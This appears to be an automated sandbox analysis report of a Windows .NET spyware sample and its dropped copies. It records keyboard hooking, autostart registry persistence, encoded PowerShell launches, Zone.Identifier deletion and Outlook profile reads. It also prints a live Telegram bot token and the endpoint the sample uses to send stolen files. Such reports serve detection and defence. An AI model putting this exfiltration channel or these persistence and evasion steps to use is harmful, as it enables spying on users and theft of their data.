              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046DD000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.525853028.0000000003573000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7D000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.524877203.0000000003393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
              Source: izwFjkhFJm.exe, 00000000.00000002.336146048.0000000005440000.00000004.08000000.00040000.00000000.sdmp, Oefdyik.exe, 00000010.00000003.350241143.000000000472E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_see
              Source: kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
              Source: kDPmkTm.exe, 00000015.00000002.536382964.00000000047F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
              Source: unknownHTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db29c7c3cbde5fHost: api.telegram.orgContent-Length: 972Expect: 100-continueConnection: Keep-Alive
              Source: unknownDNS traffic detected: queries for: api.ipify.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49699 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49701 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49702 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49715 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
              Contains functionality to register a low level keyboard hook
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 15_2_06FC01F8 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,06FC18F0,00000000,00000000
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWindow created: window name: CLIPBRDWNDCLASS
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeWindow created: window name: CLIPBRDWNDCLASS
              Source: izwFjkhFJm.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 0_2_054334F8
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 0_2_054360D0
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 15_2_018EA9B8
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 15_2_018EC978
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 15_2_018E9DA0
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 15_2_018EA0E8
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 15_2_06FC3B18
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 15_2_06FCA414
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 15_2_073E6373
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 15_2_073E9260
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 15_2_073ED4B8
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 15_2_073E4928
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 00000000.00000002.331982609.00000000027E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 00000000.00000002.334575732.00000000038B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 00000000.00000000.248218694.0000000000598000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOcotihea.exe" vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 00000000.00000003.318656978.0000000005301000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOcotihea.exe" vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 00000000.00000002.336146048.0000000005440000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWoxfcenh.dll" vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 00000000.00000002.334575732.0000000003826000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 0000000F.00000003.337045271.0000000006D3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOcotihea.exe" vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 0000000F.00000002.517910261.00000000012F8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exeBinary or memory string: OriginalFilenameOcotihea.exe" vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exeReversingLabs: Detection: 33%
              Source: izwFjkhFJm.exeVirustotal: Detection: 52%
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile read: C:\Users\user\Desktop\izwFjkhFJm.exeJump to behavior
              Source: izwFjkhFJm.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe "C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe "C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe"
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile created: C:\Users\user\AppData\Roaming\IenlugqJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile created: C:\Users\user\AppData\Local\Temp\CdFileMgrJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@29/16@8/2
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: Oefdyik.exe, 0000001B.00000002.534154582.000000000302D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: izwFjkhFJm.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5180:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3776:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_01
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: izwFjkhFJm.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: izwFjkhFJm.exeStatic file information: File size 1863168 > 1048576
              Source: izwFjkhFJm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: izwFjkhFJm.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1c4800
              Source: izwFjkhFJm.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.000000000463A000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.000000000463A000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeCode function: 0_2_0266A338 push esp; iretd
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeJump to dropped file
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeJump to dropped file

              Boot Survival

              barindex
              Creates multiple autostart registry keys
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTmJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OefdyikJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OefdyikJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OefdyikJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTmJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTmJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Hides that the sample has been downloaded from the Internet (zone.identifier)
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeFile opened: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier read attributes | delete
